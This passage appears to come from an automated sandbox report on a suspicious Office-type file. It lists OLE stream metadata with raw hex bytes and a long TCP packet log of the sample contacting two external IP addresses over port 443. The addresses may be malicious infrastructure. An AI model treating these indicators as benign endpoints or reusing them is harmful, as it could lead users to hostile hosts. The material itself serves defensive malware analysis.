Data ASCII:	3 . . . . . . . . . . . # . . .
Data Raw:	33 00 00 00 00 00 00 00 02 80 01 80 23 00 00 80

Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4

General
Stream Path:	\x18496\x17163\x16689\x18229
File Type:	data
Stream Size:	4
Entropy:	1.5
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	02 00 01 00

Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 6

General
Stream Path:	\x18496\x17165\x16949\x17894\x17778\x18492
File Type:	data
Stream Size:	6
Entropy:	1.25162916739
Base64 Encoded:	False
Data ASCII:	# . . . , .
Data Raw:	23 00 00 00 2c 00

Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 402

General
Stream Path:	\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	402
Entropy:	4.66049891256
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . ? . @ . A . B . C . D . F . G . I . J . K . L . M . O . P . Q . R . S . T . U . V . W . X . Y . Z . [ . \\ . ] . ^ . _ . ` . a . b . c . d . e . f . g . h . i . j . k . l . m . n . o . p . q . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . > . . . . . E . . . H . . . . . . . E . N . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . E . E . . . . . . . . . . . . . . . . . . .
Data Raw:	09 00 0a 00 0b 00 0d 00 0f 00 10 00 11 00 12 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 3d 00 3f 00 40 00 41 00 42 00 43 00 44 00 46 00 47 00 49 00 4a 00 4b 00 4c 00 4d 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 63 00 64 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 6f 00 70 00

Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12

General
Stream Path:	\x18496\x17548\x17648\x17522\x17512\x18487
File Type:	data
Stream Size:	12
Entropy:	1.94733879619
Base64 Encoded:	False
Data ASCII:	! . " . # . . . $ . . .
Data Raw:	21 00 22 00 23 00 00 80 24 00 00 00

Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 36

General
Stream Path:	\x18496\x17753\x17650\x17768\x18231
File Type:	data
Stream Size:	36
Entropy:	2.97385138961
Base64 Encoded:	False
Data ASCII:	{ . } . ~ . . . . . . . . . . . . . \| . \| . . . . . . . . . . . . . . .
Data Raw:	7b 00 7d 00 7e 00 80 00 82 00 83 00 85 00 87 00 89 00 7c 00 7c 00 7f 00 81 00 81 00 8d 00 86 00 88 00 8a 00

Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 16

General
Stream Path:	\x18496\x17932\x17910\x17458\x16778\x17207\x17522
File Type:	data
Stream Size:	16
Entropy:	2.6467822216
Base64 Encoded:	False
Data ASCII:	. . . . 3 . . . # . . . ( . . .
Data Raw:	0b 00 8e 00 33 81 02 8c 23 00 02 00 28 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2021 17:41:42.722287893 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:42.790455103 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:42.790560007 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:42.805668116 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:42.875108004 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:42.880286932 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:42.880338907 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:42.880367041 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:42.880417109 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:42.880465031 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:42.880472898 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.009635925 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.077416897 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.077569962 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.093837976 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.180260897 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180289030 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180301905 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180320978 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180336952 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180357933 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180362940 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.180377007 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180394888 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180404902 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.180407047 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180423975 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.180457115 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.180484056 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247353077 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247379065 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247396946 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247411966 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247427940 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247437954 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247447968 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247466087 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247473955 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247482061 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247497082 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247513056 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247534990 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247540951 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247560024 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247562885 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247577906 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247589111 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247592926 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247608900 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247625113 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247627020 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247641087 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247658014 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247673035 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247692108 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.247694969 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247714996 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.247728109 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317061901 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317116022 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317147017 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317173958 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317168951 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317198992 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317200899 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317228079 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317234039 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317253113 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317281008 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317284107 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317307949 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317317009 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317342043 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317347050 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317372084 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317398071 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317414999 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317425966 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317451954 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317470074 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317478895 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317500114 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317504883 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317531109 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317531109 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317558050 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317583084 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317586899 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317605972 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317615986 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317646980 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317668915 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317672014 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317675114 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317698956 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317701101 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317724943 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317725897 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317751884 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317756891 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317778111 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317784071 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317811966 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317816019 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317853928 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317857027 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317894936 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317904949 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317920923 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317946911 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317972898 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.317979097 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.317998886 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318026066 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318027973 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318032026 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318053007 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318053007 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318073988 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318084955 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318114042 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318116903 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318141937 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318141937 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318169117 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318171024 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318195105 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318195105 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318216085 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318221092 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.318236113 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.318262100 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.385327101 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385354996 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385371923 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385410070 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385435104 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385442019 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.385452986 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385476112 CEST	443	49704	116.203.34.79	192.168.2.3
Apr 1, 2021 17:41:43.385476112 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.385512114 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:43.385526896 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:41:44.495726109 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.555629969 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.555787086 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.556865931 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.616811037 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.617928982 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.617976904 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.618004084 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.618021011 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.618073940 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.618078947 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.664693117 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.728410006 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.728508949 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.729470968 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795595884 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795676947 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795734882 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795754910 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795800924 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795810938 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795819998 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795865059 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795874119 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795926094 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.795933008 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.795993090 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.796016932 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.796076059 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.796092987 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.796135902 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.796142101 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.796195984 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.796201944 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.796263933 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856483936 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856556892 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856606007 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856654882 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856663942 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856698990 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856705904 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856723070 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856724024 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856772900 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856792927 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856834888 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856842041 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856889009 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856898069 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856939077 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856970072 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.856992960 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.856996059 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857039928 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857057095 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857089996 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857108116 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857141972 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857161045 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857194901 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857260942 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857284069 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857311964 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857336044 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857343912 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857362986 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857435942 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857448101 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857472897 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857522964 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857542992 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857574940 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.857578039 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.857637882 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917495966 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917568922 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917620897 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917623043 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917675018 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917682886 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917690039 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917731047 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917733908 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917787075 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.917793036 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.917845011 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919126987 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919186115 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919225931 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919244051 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919261932 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919262886 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919275999 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919302940 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919323921 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919342041 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919363022 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919389963 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919406891 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919434071 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919451952 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919471979 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919492960 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919511080 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919529915 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919549942 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919574022 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919586897 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919601917 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919625998 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919645071 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919663906 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919686079 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919713020 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919722080 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919756889 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919774055 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919795036 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919821978 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919835091 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919853926 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919889927 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919895887 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.919944048 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.919954062 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920001030 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920001984 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920058012 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920063972 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920115948 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920124054 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920182943 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920185089 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920243025 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920250893 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920300961 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920301914 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920358896 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920370102 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920398951 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920423985 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920438051 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920454979 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920476913 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920495987 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920523882 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920540094 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920567989 CEST	443	49705	185.81.0.109	192.168.2.3
Apr 1, 2021 17:41:44.920587063 CEST	49705	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:41:44.920607090 CEST	443	49705	185.81.0.109	192.168.2.3
